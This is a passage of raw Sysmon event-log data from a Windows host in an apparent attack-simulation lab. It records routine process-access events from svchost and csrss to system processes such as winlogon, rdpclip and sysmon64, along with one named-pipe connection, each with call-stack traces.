12:24:44.085{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441029Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.085{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441028Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.085{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441027Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.085{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441026Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.084{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441025Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.080{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441024Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.079{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441023Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.079{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441022Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.078{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441021Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.078{42DC5269-CE98-6086-0C00-00000000BA01}8404316C:\Windows\system32\svchost.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441020Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.078{42DC5269-D4CC-6086-E904-00000000BA01}47844736C:\Windows\system32\csrss.exe{42DC5269-028C-6088-C728-00000000BA01}5892C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000441019Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+2de4|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441018Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2dce|c:\windows\system32\lsm.dll+57af|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x8000000000000000441017Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-ConnectPipe2021-04-27 12:24:44.077{42DC5269-CE99-6086-0E00-00000000BA01}1016\TSVCPIPE-69b67095-441f-4faa-93f1-e17fb1a8b219C:\Windows\System32\svchost.exe 10341000x8000000000000000441016Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+5b40|c:\windows\system32\lsm.dll+5f9d|c:\windows\system32\lsm.dll+57a4|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441015Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441014Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441013Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-D4CE-6086-F004-00000000BA01}2052C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441012Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441011Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441010Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441009Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441008Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441007Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8405596C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1200-00000000BA01}480C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441006Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441005Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.076{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb